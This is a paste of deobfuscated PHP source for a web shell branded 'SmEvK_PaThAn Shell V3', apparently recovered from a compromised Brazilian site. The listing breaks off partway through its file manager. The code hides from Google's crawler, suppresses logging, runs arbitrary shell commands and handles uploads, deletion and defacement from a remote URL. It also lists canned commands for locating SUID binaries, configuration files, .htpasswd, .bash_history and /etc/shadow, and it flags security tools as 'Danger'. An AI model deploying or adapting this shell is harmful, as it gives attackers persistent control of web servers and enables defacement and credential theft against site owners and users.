· 6 years ago · Jul 20, 2019, 11:12 AM
1Original obfuscated code: http://granportale.com.br/projetos/34-wp-mailing.php / http://granportale.com.br/projetos/34-wp-mailing.txt
2
3<?php
4
5$default_action = 'FilesMan';
6@define('SELF_PATH', __FILE__);
7if( strpos($_SERVER['HTTP_USER_AGENT'],'Google') !== false ) {
8 header('HTTP/1.0 404 Not Found');
9 exit;
10}
11
12@session_start();
13@error_reporting(0);
14@ini_set('error_log',NULL);
15@ini_set('display_errors',0);
16@ini_set('log_errors',0);
17@ini_set('max_execution_time',0);
18@set_time_limit(0);
19@set_magic_quotes_runtime(0);
20if( get_magic_quotes_gpc() ) {
21 function stripslashes_array($array) {
22 return is_array($array) ? array_map('stripslashes_array', $array) : stripslashes($array);
23 }
24 $_POST = stripslashes_array($_POST);
25}
26
27function printLogin() {
28 if ($_POST['pass'] != $auth_pass && $_POST['uname'] != $UserName) {
29 $status = 'Wrong Password or UserName :(';
30
31
32}
33
34?>
35
36<html>
37<head>
38<title>SmEvK v3</title>
39<link href="https://fonts.googleapis.com/css?family=Josefin+Sans:400,100" rel="stylesheet">
40</head>
41<style>
42body{
43 font-family: Josefin Sans, sans-serif;
44 background: black;
45 color:#ABEFFF;
46}
47 .loginpage img{
48 width: 500px;
49 height: 150px;
50 }
51 .loginpage{
52 height: 400px;
53 width: 500px;
54 border:1px solid;
55 border-color:#ABEFFF;
56 text-align: center;
57 border-radius: 5px;
58 margin-top: 100px;
59 }
60 #pageheading{
61 font-size:25px;
62 color:#ABEFFF;
63 margin-top: 10px;
64 }
65 .loginpage img{
66 width: 500px;
67
68 }
69 input{
70 background: black;
71 border-color:#ABEFFF;
72 border-radius: 10px;
73 margin-top: 10px;
74 padding:5px;
75 color: #ABEFFF;
76 }
77 input:hover{
78 background: #ABEFFF;
79 color: red;
80
81 }
82
83</style>
84<body>
85<center>
86<div class="loginpage">
87 <img src="http://i63.tinypic.com/1108vic.jpg" alt="Smevk Logo">
88 <div id="pageheading">SmEvK_PaThAn Shell V3</div>
89 <form method="post">
90 User Name: <input type="text" name="uname" ><br>
91 Password : <input type="password" name="pass" ><br>
92 <input type="submit" name="login" value="Login">
93 <?php
94
95 if (isset($status)) {
96 ?>
97
98
99
100
101 </form>
102
103</d<p><?=$status?></p>
104</center>
105</body>
106</html>
107
108<?php
109
110
111 }
112 exit;
113}
114
115if( !isset( $_SESSION[md5($_SERVER['HTTP_HOST'])] ))
116 if( empty( $auth_pass ) ||
117 ( isset( $_POST['pass'] ) && ($_POST['pass']) == $auth_pass && ($_POST['uname']) == $UserName))
118 $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
119
120 else
121
122 printLogin();
123
124if( strtolower( substr(PHP_OS,0,3) ) == "win" )
125 $os = 'win';
126else
127 $os = 'nix';
128$safe_mode = @ini_get('safe_mode');
129$disable_functions = @ini_get('disable_functions');
130$home_cwd = @getcwd();
131if( isset( $_POST['c'] ) )
132 @chdir($_POST['c']);
133$cwd = @getcwd();
134if( $os == 'win') {
135 $home_cwd = str_replace("\\", "/", $home_cwd);
136 $cwd = str_replace("\\", "/", $cwd);
137}
138if( $cwd[strlen($cwd)-1] != '/' )
139 $cwd .= '/';
140
141if($os == 'win') {
142 $aliases = array(
143 "List Directory" => "dir",
144 "Find index.php in current dir" => "dir /s /w /b index.php",
145 "Find *config*.php in current dir" => "dir /s /w /b *config*.php",
146 "Show active connections" => "netstat -an",
147 "Show running services" => "net start",
148 "User accounts" => "net user",
149 "Show computers" => "net view",
150 "ARP Table" => "arp -a",
151 "IP Configuration" => "ipconfig /all"
152 );
153} else {
154 $aliases = array(
155 "List dir" => "ls -la",
156 "list file attributes on a Linux second extended file system" => "lsattr -va",
157 "show opened ports" => "netstat -an | grep -i listen",
158 "Find" => "",
159 "find all suid files" => "find / -type f -perm -04000 -ls",
160 "find suid files in current dir" => "find . -type f -perm -04000 -ls",
161 "find all sgid files" => "find / -type f -perm -02000 -ls",
162 "find sgid files in current dir" => "find . -type f -perm -02000 -ls",
163 "find config.inc.php files" => "find / -type f -name config.inc.php",
164 "find config* files" => "find / -type f -name \"config*\"",
165 "find config* files in current dir" => "find . -type f -name \"config*\"",
166 "find all writable folders and files" => "find / -perm -2 -ls",
167 "find all writable folders and files in current dir" => "find . -perm -2 -ls",
168 "find all service.pwd files" => "find / -type f -name service.pwd",
169 "find service.pwd files in current dir" => "find . -type f -name service.pwd",
170 "find all .htpasswd files" => "find / -type f -name .htpasswd",
171 "find .htpasswd files in current dir" => "find . -type f -name .htpasswd",
172 "find all .bash_history files" => "find / -type f -name .bash_history",
173 "find .bash_history files in current dir" => "find . -type f -name .bash_history",
174 "find all .fetchmailrc files" => "find / -type f -name .fetchmailrc",
175 "find .fetchmailrc files in current dir" => "find . -type f -name .fetchmailrc",
176 "Locate" => "",
177 "locate httpd.conf files" => "locate httpd.conf",
178 "locate vhosts.conf files" => "locate vhosts.conf",
179 "locate proftpd.conf files" => "locate proftpd.conf",
180 "locate psybnc.conf files" => "locate psybnc.conf",
181 "locate my.conf files" => "locate my.conf",
182 "locate admin.php files" =>"locate admin.php",
183 "locate cfg.php files" => "locate cfg.php",
184 "locate conf.php files" => "locate conf.php",
185 "locate config.dat files" => "locate config.dat",
186 "locate config.php files" => "locate config.php",
187 "locate config.inc files" => "locate config.inc",
188 "locate config.inc.php" => "locate config.inc.php",
189 "locate config.default.php files" => "locate config.default.php",
190 "locate config* files " => "locate config",
191 "locate .conf files"=>"locate '.conf'",
192 "locate .pwd files" => "locate '.pwd'",
193 "locate .sql files" => "locate '.sql'",
194 "locate .htpasswd files" => "locate '.htpasswd'",
195 "locate .bash_history files" => "locate '.bash_history'",
196 "locate .mysql_history files" => "locate '.mysql_history'",
197 "locate .fetchmailrc files" => "locate '.fetchmailrc'",
198 "locate backup files" => "locate backup",
199 "locate dump files" => "locate dump",
200 "locate priv files" => "locate priv"
201 );
202}
203 if(isset($_POST['p1']) && $_POST['p1']=='deface') {
204
205 $def = file_get_contents($deface_url);
206 file_put_contents($_POST['c'].$_POST['p2'],$def);
207 }
208function ex($in) {
209 $out = '';
210 if(function_exists('exec')) {
211 @exec($in,$out);
212 $out = @join("\n",$out);
213 }elseif(function_exists('passthru')) {
214 ob_start();
215 @passthru($in);
216 $out = ob_get_clean();
217 }elseif(function_exists('system')) {
218 ob_start();
219 @system($in);
220 $out = ob_get_clean();
221 }elseif(function_exists('shell_exec')) {
222 $out = shell_exec($in);
223 }elseif(is_resource($f = @popen($in,"r"))) {
224 $out = "";
225 while(!@feof($f))
226 $out .= fread($f,1024);
227 pclose($f);
228 }
229 return $out;
230}
231
232function which($p) {
233 $path = ex('which '.$p);
234 if(!empty($path))
235 return $path;
236 return false;
237}
238
239function printHeader() {
240 if(empty($_POST['charset']))
241 $_POST['charset'] = "UTF-8";
242 global $color;
243 global $Theme;
244 global $TabsColor;
245 echo "<html><head><link href='https://fonts.googleapis.com/css?family=Josefin+Sans:400,100' rel='stylesheet' type='text/css'></head>";
246 echo '<html>
247<meta http-equiv="Content-Type" content="text/html; charset='.$_POST['charset'].'"><title>SmEvK v3</title>
248<style>
249 body {background-color:black;color:#fff;}
250 body,td,th { font-family: Josefin Sans, sans-serif;font-size:13px;margin:0;vertical-align:top; }
251 span,h1,a { color:'.$color.' !important; }
252 span { font-weight: bolder; }
253 h1 { padding: 0px 5px;font: 14pt audiowide;margin:0px 0 0 0px; }
254 div.content { padding: 0px;margin:0 0px;background: #0F1010;border:1px solid '.$Theme.'; border-radius:5px;}
255 a { text-decoration:none; }
256 a:hover { border-bottom:0px solid #5e5e5e;text-decoration:none; }
257 a:hover{cursor: url("http://downloads.totallyfreecursors.com/cursor_files/pakistan.ani"), url("http://downloads.totallyfreecursors.com/thumbnails/PAKISTAN.gif"), auto;text-decoration:none;}
258 .ml1 { border:1px solid '.$Theme.';padding:px;margin:0;overflow: auto; }
259 .bigarea { width:100%;height:250px;margin-top:0px; border-radius:10px; border-color:'.$Theme.'; background:#2F2F2F;}
260 input, textarea, select { margin-top:0;color:#63E1FF;background-color:black;border-radius:5px;border:1px solid '.$Theme.'; border-radis:5px;font: 10pt arial,"Courier New"; }
261 input[type="button"]:hover,input[type="submit"]:hover {background-color:#094F60;color:black;text-decoration:none;}
262 form { margin:0px; background:#0F1010;}
263 #toolsTbl { text-align:center; }
264 .toolsInp { width: 80%; background:black; border-radius:5px; border-color:'.$Theme.'; }
265 .main th {text-align:left;background-color:'.$TabsColor.';}
266 .main tr:hover{background:'.$Theme.'; border:5px solid;border-color:'.$Theme.';}
267 .main td, th{vertical-align:middle;}
268 .menu { height:30px; border-radius:10px;}
269 .menu th{padding:1px;border-radius: 5px; background:'.$TabsColor.'; -webkit-transform: rotate(20deg);
270 -moz-transform: rotate(20deg);
271 -o-transform: rotate(20deg);
272 -ms-transform: rotate(20deg);
273 transform: rotate(20deg);}
274 .menu th:hover{background:#0F1010;text-decoration: none;}
275 pre {font-family: Josefin Sans, sans-serif;color:#FFFFFF;}
276 #cot_tl_fixed{position:fixed;bottom:0px;font-size:12px;left:0px;padding:4px 0;clip:_top:expression(document.documentElement.scrollTop+document.documentElement.clientHeight-this.clientHeight);_left:expression(document.documentElement.scrollLeft + document.documentElement.clientWidth - offsetWidth);}
277
278
279 .cpr {margin-bottom:5px;font-weight:bold; }
280 .cpb {width:34px;margin:0 5px;}
281
282 .npoad td {padding:0;}
283 #Smevktools{
284 margin-top:50px;
285 width:500px;
286 border:1px solid;
287 border-radius:10px;
288 }
289 .smevklogo td{
290 font-size:12px;
291 font-weight:bold;
292
293
294
295 }
296 .smevklogo{
297 margin-left:5px;
298 background:url(http://i63.tinypic.com/1108vic.jpg);
299 background-repeat: no-repeat;
300 background-position: CENTER;
301 background-color:#0F1010;
302 background-size: 400px 120px;
303
304
305
306 }
307 </style>
308
309</html>
310<style type="text/css">body, a:hover {text-decoration:none;cursor: url(http://cur.cursors-4u.net/cursors/cur-11/cur1054.cur), progress !important;}</style><a href="http://www.cursors-4u.com/cursor/2012/02/11/chrome-pointer.html" target="_blank" title="Chrome Pointer"><img src="http://cur.cursors-4u.net/cursor.png" border="0" alt="Chrome Pointer" style="position:absolute; top: 0px; right: 0px;" /></a>
311 <script>
312 function set(a,c,p1,p2,p3,charset) {
313 if(a != null)document.mf.a.value=a;
314 if(c != null)document.mf.c.value=c;
315 if(p1 != null)document.mf.p1.value=p1;
316 if(p2 != null)document.mf.p2.value=p2;
317 if(p3 != null)document.mf.p3.value=p3;
318 if(charset != null)document.mf.charset.value=charset;
319 }
320 function g(a,c,p1,p2,p3,charset) {
321 set(a,c,p1,p2,p3,charset);
322 document.mf.submit();
323 }
324 function a(a,c,p1,p2,p3,charset) {
325 set(a,c,p1,p2,p3,charset);
326 var params = "ajax=true";
327 for(i=0;i<document.mf.elements.length;i++)
328 params += "&"+document.mf.elements[i].name+"="+encodeURIComponent(document.mf.elements[i].value);
329 sr("'.$_SERVER['REQUEST_URI'].'", params);
330 }
331 function sr(url, params) {
332 if (window.XMLHttpRequest) {
333 req = new XMLHttpRequest();
334 req.onreadystatechange = processReqChange;
335 req.open("POST", url, true);
336 req.setRequestHeader ("Content-Type", "application/x-www-form-urlencoded");
337 req.send(params);
338 }
339 else if (window.ActiveXObject) {
340 req = new ActiveXObject("Microsoft.XMLHTTP");
341 if (req) {
342 req.onreadystatechange = processReqChange;
343 req.open("POST", url, true);
344 req.setRequestHeader ("Content-Type", "application/x-www-form-urlencoded");
345 req.send(params);
346 }
347 }
348 }
349 function processReqChange() {
350 if( (req.readyState == 4) )
351 if(req.status == 200) {
352 //alert(req.responseText);
353 var reg = new RegExp("(\\d+)([\\S\\s]*)", "m");
354 var arr=reg.exec(req.responseText);
355 eval(arr[2].substr(0, arr[1]));
356 }
357 else alert("Request error!");
358 }
359 </script>
360 <head><link href="https://fonts.googleapis.com/css?family=Audiowide" ></head><body><div style="position:absolute;width:100%;top:0;left:0;"><div style="margin:5px;background:black;"><div class="content" style="border:1px solid '.$Theme.'; border-radius:5px;">
361 <form method=post name=mf style="display:none;">
362 <input type=hidden name=a value="'.(isset($_POST['a'])?$_POST['a']:'').'">
363 <input type=hidden name=c value="'.htmlspecialchars($GLOBALS['cwd']).'">
364 <input type=hidden name=p1 value="'.(isset($_POST['p1'])?htmlspecialchars($_POST['p1']):'').'">
365 <input type=hidden name=p2 value="'.(isset($_POST['p2'])?htmlspecialchars($_POST['p2']):'').'">
366 <input type=hidden name=p3 value="'.(isset($_POST['p3'])?htmlspecialchars($_POST['p3']):'').'">
367 <input type=hidden name=charset value="'.(isset($_POST['charset'])?$_POST['charset']:'').'">
368 </form>';
369 $freeSpace = @diskfreespace($GLOBALS['cwd']);
370 $totalSpace = @disk_total_space($GLOBALS['cwd']);
371 $totalSpace = $totalSpace?$totalSpace:1;
372 $disable_functions = @ini_get('disable_functions');
373 $release = @php_uname('r');
374 $kernel = @php_uname('s');
375 if(!function_exists('posix_getegid')) {
376 $user = @get_current_user();
377 $uid = @getmyuid();
378 $gid = @getmygid();
379 $group = "?";
380 } else {
381 $uid = @posix_getpwuid(@posix_geteuid());
382 $gid = @posix_getgrgid(@posix_getegid());
383 $user = $uid['name'];
384 $uid = $uid['uid'];
385 $group = $gid['name'];
386 $gid = $gid['gid'];
387 }
388 $cwd_links = '';
389 $path = explode("/", $GLOBALS['cwd']);
390 $n=count($path);
391 for($i=0;$i<$n-1;$i++) {
392 $cwd_links .= "<a href='#' onclick='g(\"FilesMan\",\"";
393 for($j=0;$j<=$i;$j++)
394 $cwd_links .= $path[$j].'/';
395 $cwd_links .= "\")'>".$path[$i]."/</a>";
396 }
397 $charsets = array('UTF-8', 'Windows-1251', 'KOI8-R', 'KOI8-U', 'cp866');
398 $opt_charsets = '';
399 foreach($charsets as $item)
400 $opt_charsets .= '<option value="'.$item.'" '.($_POST['charset']==$item?'selected':'').'>'.$item.'</option>';
401 $m = array('Sec. Info'=>'SecInfo','Files'=>'FilesMan','Console'=>'Console','Bypasser'=>'SafeMode','Safe Mode'=>'Bypass','String tools'=>'StringTools','Import Scripts'=>'ImportScripts','Network'=>'Network','Readable Dirs'=>'Readable','Defacer' => 'Deface','Code Injector'=>'Injector','Domains' => 'Domain');
402 if(!empty($GLOBALS['auth_pass']))
403 $m['Logout'] = 'Logout';
404 $menu = '';
405 foreach($m as $k => $v)
406 $menu .= '<th><a href="#" onclick="g(\''.$v.'\',null,\'\',\'\',\'\')">'.$k.'</a></th>';
407 $drives = "";
408 if ($GLOBALS['os'] == 'win') {
409 foreach( range('a','z') as $drive ){
410 if (is_dir($drive.':\\'))
411 $drives .= '<a href="#" onclick="g(\'FilesMan\',\''.$drive.':/\')">[ '.$drive.' ]</a> ';
412 }
413 $drives .= '<br />: ';
414 }
415 if($GLOBALS['os'] == 'nix') {
416 $dominios = @file_get_contents("/etc/named.conf");
417 if(!$dominios) {
418 $DomainS = "/var/named";
419 $Domainonserver = scandir($DomainS);
420 $d0c = count($Domainonserver);
421 } else {
422 @preg_match_all('/.*?zone "(.*?)" {/', $dominios, $out);
423 $out = sizeof(array_unique($out[1]));
424 $d0c = $out." Domains";
425 }
426 } else {
427 $d0c = "Nothing here bro:(";
428 }
429 if($GLOBALS['os'] == 'nix' )
430 {
431 $usefl = ''; $dwnldr = '';
432 if(!@ini_get('safe_mode')) {
433 $temp = array();
434 $userful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl');
435 foreach($userful as $item) { if(which($item)) $temp[]= $item; }
436 $usefl = implode(', ',$temp);
437 $temp = array();
438 $downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror');
439 foreach($downloaders as $item2) { if(which($item2)) $temp[]= $item2; }
440 $dwnldr = implode(', ',$temp);
441 } else {
442 $usefl = ' ------- '; $dwnldr = ' ------- ';
443 }
444 } else {
445 $usefl = ' ------- '; $dwnldr = ' ------- ';
446 }
447 echo '<div class="smevklogo"><table class="info" cellpadding="0" cellspacing="0" width="100%"><tr>
448 <td><table cellpadding="3" cellspacing="0" class="npoad"><tr><td width="80px;"><span>Uname</span></td><td>: <nobr>'.substr(@php_uname(), 0, 120).'</nobr></td></tr>
449 <tr><td><span>User</span></td><td>: '.$uid.' ( '.$user.' ) <span>Group: </span> '.$gid.' ( '.$group.' )</td></tr><tr><td><span>Server</span></td><td>: '.@getenv('SERVER_SOFTWARE').'</td></tr><tr><td><span>Useful</span></td><td>: '.$usefl.'</td></tr><tr><td><span>Downloaders</span></td><td>: '.$dwnldr.'</td></tr><tr><td><span>D/functions</span></td><td>: '.($disable_functions?$disable_functions:'All Function Enable').'</td></tr><tr><td><span>'.($GLOBALS['os'] == 'win'?'Drives<br />Cwd':'Cwd').'</span></td><td>: '.$drives.''.$cwd_links.' '.viewPermsColor($GLOBALS['cwd']).' <a href=# onclick="g(\'FilesMan\',\''.$GLOBALS['home_cwd'].'\',\'\',\'\',\'\')">[ home ]</a></td></tr></table></td>'.
450 '<td width=4><nobr><span>Sv IP</span><br><span>Your IP</span><br /><span>HDD</span><br /><span>Free</span><br /><span>PHP</span><br /><span>Safe Mode</span><br /><span>Domains</span></nobr></td>'.
451 '<td><nobr>: '.gethostbyname($_SERVER["HTTP_HOST"]).'<br>: '.$_SERVER['REMOTE_ADDR'].'<br />: '.viewSize($totalSpace).'<br />: '.viewSize($freeSpace).' ('.(int)($freeSpace/$totalSpace*100).'%)<br>: '.@phpversion().' <a href=# onclick="g(\'Php\',null,null,\'info\')">[ phpinfo ]</a><br />: '.($GLOBALS['safe_mode']?'<font color=red>ON</font>':'<font color='.$color.'<b>OFF</b></font>').'<br />: '.$d0c.'</nobr></td></tr></table></div>'.
452 '</div></div><div style="margin:5;background:black;"><div class="content" style="border-top:5px solid 430303;padding:2px;"><table cellpadding="3" cellspacing="0" width="100%" class="menu"><tr>'.$menu.'</tr></table></div></div><div style="margin:5;background:black;">';
453}
454
455function printFooter() {
456 $is_writable = is_writable($GLOBALS['cwd'])?"<font color=green>[ Writeable ]</font>":"<font color=red>[ Not writable ]</font>";
457
458echo '</div><div style="margin:5px;background:black;"><div class="content" style="border:1px solid '.$Theme.'; border-radius:5px;">
459<table class="info" id="toolsTbl" cellpadding="3" cellspacing="0" width="100%">
460 <tr>
461 <td><form onsubmit="g(null,this.c.value);return false;"><span>Change dir:</span><br><input class="toolsInp" type=text name=c value="'.htmlspecialchars($GLOBALS['cwd']).'"><input type=submit value=">>"></form></td>
462 <td><form onsubmit="g(\'FilesTools\',null,this.f.value);return false;"><span>Read file:</span><br><input class="toolsInp" type=text name=f><input type=submit value=">>"></form></td>
463 </tr>
464 <tr>
465 <td><form onsubmit="g(\'FilesMan\',null,\'mkdir\',this.d.value);return false;"><span>Make dir:</span><br><input class="toolsInp" type=text name=d><input type=submit value=">>"></form>'.$is_writable.'</td>
466 <td><form onsubmit="g(\'FilesTools\',null,this.f.value,\'mkfile\');return false;"><span>Make file:</span><br><input class="toolsInp" type=text name=f><input type=submit value=">>"></form>'.$is_writable.'</td>
467 </tr>
468 <tr>
469 <td><form onsubmit="g(\'Console\',null,this.c.value);return false;"><span>Execute:</span><br><input class="toolsInp" type=text name=c value=""><input type=submit value=">>"></form></td>
470 <td><form method="post" ENCTYPE="multipart/form-data">
471 <input type=hidden name=a value="FilesMAn">
472 <input type=hidden name=c value="'.htmlspecialchars($GLOBALS['cwd']).'">
473 <input type=hidden name=p1 value="uploadFile">
474 <input type=hidden name=charset value="'.(isset($_POST['charset'])?$_POST['charset']:'').'">
475 <span>Upload file:</span><br><input class="toolsInp" type=file name=f><input type=submit value=">>"></form>'.$is_writable.'</td>
476 </tr>
477</table></div></div>
478<div style="margin:5px;background:black;"><div class="content" style="border:2px solid '.$Theme.';text-align:center;font-weight:bold; border-radius:10px;margin:auto; width:500;">SmEvK_PaThAn Shell v3 coded by <a href="https://www.facebook.com/smevkpathan"> Kashif Khan</a></div></div>
479</div>
480</body></html>';
481}
482
483if ( !function_exists("posix_getpwuid") && (strpos($GLOBALS['disable_functions'], 'posix_getpwuid')===false) ) { function posix_getpwuid($p) { return false; } }
484if ( !function_exists("posix_getgrgid") && (strpos($GLOBALS['disable_functions'], 'posix_getgrgid')===false) ) { function posix_getgrgid($p) { return false; } }
485
486
487function viewSize($s) {
488 if($s >= 1073741824)
489 return sprintf('%1.2f', $s / 1073741824 ). ' GB';
490 elseif($s >= 1048576)
491 return sprintf('%1.2f', $s / 1048576 ) . ' MB';
492 elseif($s >= 1024)
493 return sprintf('%1.2f', $s / 1024 ) . ' KB';
494 else
495 return $s . ' B';
496}
497
498function perms($p) {
499 if (($p & 0xC000) == 0xC000)$i = 's';
500 elseif (($p & 0xA000) == 0xA000)$i = 'l';
501 elseif (($p & 0x8000) == 0x8000)$i = '-';
502 elseif (($p & 0x6000) == 0x6000)$i = 'b';
503 elseif (($p & 0x4000) == 0x4000)$i = 'd';
504 elseif (($p & 0x2000) == 0x2000)$i = 'c';
505 elseif (($p & 0x1000) == 0x1000)$i = 'p';
506 else $i = 'u';
507 $i .= (($p & 0x0100) ? 'r' : '-');
508 $i .= (($p & 0x0080) ? 'w' : '-');
509 $i .= (($p & 0x0040) ? (($p & 0x0800) ? 's' : 'x' ) : (($p & 0x0800) ? 'S' : '-'));
510 $i .= (($p & 0x0020) ? 'r' : '-');
511 $i .= (($p & 0x0010) ? 'w' : '-');
512 $i .= (($p & 0x0008) ? (($p & 0x0400) ? 's' : 'x' ) : (($p & 0x0400) ? 'S' : '-'));
513 $i .= (($p & 0x0004) ? 'r' : '-');
514 $i .= (($p & 0x0002) ? 'w' : '-');
515 $i .= (($p & 0x0001) ? (($p & 0x0200) ? 't' : 'x' ) : (($p & 0x0200) ? 'T' : '-'));
516 return $i;
517}
518
519function viewPermsColor($f) {
520 if (!@is_readable($f))
521 return '<font color=#FF0000><b>'.perms(@fileperms($f)).'</b></font>';
522 elseif (!@is_writable($f))
523 return '<font color=white><b>'.perms(@fileperms($f)).'</b></font>';
524 else
525 return '<font color=#00BB00><b>'.perms(@fileperms($f)).'</b></font>';
526}
527
528if(!function_exists("scandir")) {
529 function scandir($dir) {
530 $dh = opendir($dir);
531 while (false !== ($filename = readdir($dh))) {
532 $files[] = $filename;
533 }
534 return $files;
535 }
536}
537
538function actionSecInfo() {
539 printHeader();
540 echo '<h1>Server security information</h1><div class=content>';
541 function showSecParam($n, $v) {
542 $v = trim($v);
543 if($v) {
544 echo '<span>'.$n.': </span>';
545 if(strpos($v, "\n") === false)
546 echo $v.'<br>';
547 else
548 echo '<pre class=ml1>'.$v.'</pre>';
549 }
550 }
551
552 showSecParam('Server software', @getenv('SERVER_SOFTWARE'));
553 showSecParam('Disabled PHP Functions', ($GLOBALS['disable_functions'])?$GLOBALS['disable_functions']:'none');
554 showSecParam('Open base dir', @ini_get('open_basedir'));
555 showSecParam('Safe mode exec dir', @ini_get('safe_mode_exec_dir'));
556 showSecParam('Safe mode include dir', @ini_get('safe_mode_include_dir'));
557 showSecParam('cURL support', function_exists('curl_version')?'enabled':'no');
558 $temp=array();
559 if(function_exists('mysql_get_client_info'))
560 $temp[] = "MySql (".mysql_get_client_info().")";
561 if(function_exists('mssql_connect'))
562 $temp[] = "MSSQL";
563 if(function_exists('pg_connect'))
564 $temp[] = "PostgreSQL";
565 if(function_exists('oci_connect'))
566 $temp[] = "Oracle";
567 showSecParam('Supported databases', implode(', ', $temp));
568 echo '<br>';
569
570 if( $GLOBALS['os'] == 'nix' ) {
571 $userful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl');
572 $danger = array('kav','nod32','bdcored','uvscan','sav','drwebd','clamd','rkhunter','chkrootkit','iptables','ipfw','tripwire','shieldcc','portsentry','snort','ossec','lidsadm','tcplodg','sxid','logcheck','logwatch','sysmask','zmbscap','sawmill','wormscan','ninja');
573 $downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror');
574 showSecParam('Readable /etc/passwd', @is_readable('/etc/passwd')?"yes <a href='#' onclick='g(\"FilesTools\", \"/etc/\", \"passwd\")'>[view]</a>":'no');
575 showSecParam('Readable /etc/shadow', @is_readable('/etc/shadow')?"yes <a href='#' onclick='g(\"FilesTools\", \"etc\", \"shadow\")'>[view]</a>":'no');
576 showSecParam('OS version', @file_get_contents('/proc/version'));
577 showSecParam('Distr name', @file_get_contents('/etc/issue.net'));
578 if(!$GLOBALS['safe_mode']) {
579 echo '<br>';
580 $temp=array();
581 foreach ($userful as $item)
582 if(which($item)){$temp[]=$item;}
583 showSecParam('Userful', implode(', ',$temp));
584 $temp=array();
585 foreach ($danger as $item)
586 if(which($item)){$temp[]=$item;}
587 showSecParam('Danger', implode(', ',$temp));
588 $temp=array();
589 foreach ($downloaders as $item)
590 if(which($item)){$temp[]=$item;}
591 showSecParam('Downloaders', implode(', ',$temp));
592 echo '<br/>';
593 showSecParam('Hosts', @file_get_contents('/etc/hosts'));
594 showSecParam('HDD space', ex('df -h'));
595 showSecParam('Mount options', @file_get_contents('/etc/fstab'));
596 }
597 } else {
598 showSecParam('OS Version',ex('ver'));
599 showSecParam('Account Settings',ex('net accounts'));
600 showSecParam('User Accounts',ex('net user'));
601 }
602 echo '</div>';
603 printFooter();
604}
605
606function actionFilesMan() {
607 printHeader();
608 echo '<h1>File manager</h1><div class=content>';
609 if(isset($_POST['p1']) && $_POST['p1']!='deface') {
610 switch($_POST['p1']) {
611 case 'uploadFile':
612 if(!@move_uploaded_file($_FILES['f']['tmp_name'], $_FILES['f']['name']))
613 echo "Can't upload file!";
614 break;
615 break;
616 case 'mkdir':
617 if(!@mkdir($_POST['p2']))
618 echo "Can't create new dir";
619 break;
620 case 'delete':
621 function deleteDir($path) {
622 $path = (substr($path,-1)=='/') ? $path:$path.'/';
623 $dh = opendir($path);
624 while ( ($item = readdir($dh) ) !== false) {
625 $item = $path.$item;
626 if ( (basename($item) == "..") || (basename($item) == ".") )
627 continue;
628 $type = filetype($item);
629 if ($type == "dir")
630 deleteDir($item);
631 else
632 @unlink($item);
633 }
634 closedir($dh);
635 rmdir($path);
636 }
637 if(is_array(@$_POST['f']))
638 foreach($_POST['f'] as $f) {
639 $f = urldecode($f);
640 if(is_dir($f))
641 deleteDir($f);
642 else
643 @unlink($f);
644 }
645 break;
646
647
648
649
650 case 'paste':
651 if($_SESSION['act'] == 'copy') {
652 function copy_paste($c,$s,$d){
653 if(is_dir($c.$s)){
654 mkdir($d.$s);
655 $h = opendir($c.$s);
656 while (($f = readdir($h)) !== false)
657 if (($f != ".") and ($f != "..")) {
658 copy_paste($c.$s.'/',$f, $d.$s.'/');
659 }
660 } elseif(is_file($c.$s)) {
661 @copy($c.$s, $d.$s);
662 }
663 }
664 foreach($_SESSION['f'] as $f)
665 copy_paste($_SESSION['cwd'],$f, $GLOBALS['cwd']);
666 } elseif($_SESSION['act'] == 'move') {
667 function move_paste($c,$s,$d){
668 if(is_dir($c.$s)){
669 mkdir($d.$s);
670 $h = opendir($c.$s);
671 while (($f = readdir($h)) !== false)
672 if (($f != ".") and ($f != "..")) {
673 copy_paste($c.$s.'/',$f, $d.$s.'/');
674 }
675 } elseif(is_file($c.$s)) {
676 @copy($c.$s, $d.$s);
677 }
678 }
679 foreach($_SESSION['f'] as $f)
680 @rename($_SESSION['cwd'].$f, $GLOBALS['cwd'].$f);
681 }
682 unset($_SESSION['f']);
683 break;
684 default:
685 if(!empty($_POST['p1']) && (($_POST['p1'] == 'copy')||($_POST['p1'] == 'move')) ) {
686 $_SESSION['act'] = @$_POST['p1'];
687 $_SESSION['f'] = @$_POST['f'];
688 foreach($_SESSION['f'] as $k => $f)
689 $_SESSION['f'][$k] = urldecode($f);
690 $_SESSION['cwd'] = @$_POST['c'];
691 }
692 break;
693 }
694 echo '<script>document.mf.p1.value="";document.mf.p2.value="";</script>';
695 }
696
697 $dirContent = @scandir(isset($_POST['c'])?$_POST['c']:$GLOBALS['cwd']);
698 if($dirContent === false) { echo 'Can\'t open this folder!'; return; }
699 global $sort;
700 $sort = array('name', 1);
701 if(!empty($_POST['p1'])) {
702 if(preg_match('!s_([A-z]+)_(\d{1})!', $_POST['p1'], $match))
703 $sort = array($match[1], (int)$match[2]);
704 }
705 echo '<script>
706 function sa() {
707 for(i=0;i<document.files.elements.length;i++)
708 if(document.files.elements[i].type == \'checkbox\')
709 document.files.elements[i].checked = document.files.elements[0].checked;
710 }
711 </script>
712 <table width=\'100%\' class=\'main\' cellspacing=\'0\' cellpadding=\'2\'>
713 <form name=files method=post>';
714 echo "<tr><th width='13px'><input type=checkbox onclick='sa()' class=chkbx></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_name_".($sort[1]?0:1)."\")'>Name</a></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_size_".($sort[1]?0:1)."\")'>Size</a></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_modify_".($sort[1]?0:1)."\")'>Modify</a></th><th>Owner/Group</th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_perms_".($sort[1]?0:1)."\")'>Permissions</a></th><th>Actions</th></tr>";
715 $dirs = $files = $links = array();
716 $n = count($dirContent);
717 for($i=0;$i<$n;$i++) {
718 $ow = @posix_getpwuid(@fileowner($dirContent[$i]));
719 $gr = @posix_getgrgid(@filegroup($dirContent[$i]));
720 $tmp = array('name' => $dirContent[$i],
721 'path' => $GLOBALS['cwd'].$dirContent[$i],
722 'modify' => @date('Y-m-d H:i:s',@filemtime($GLOBALS['cwd'].$dirContent[$i])),
723 'perms' => viewPermsColor($GLOBALS['cwd'].$dirContent[$i]),
724 'size' => @filesize($GLOBALS['cwd'].$dirContent[$i]),
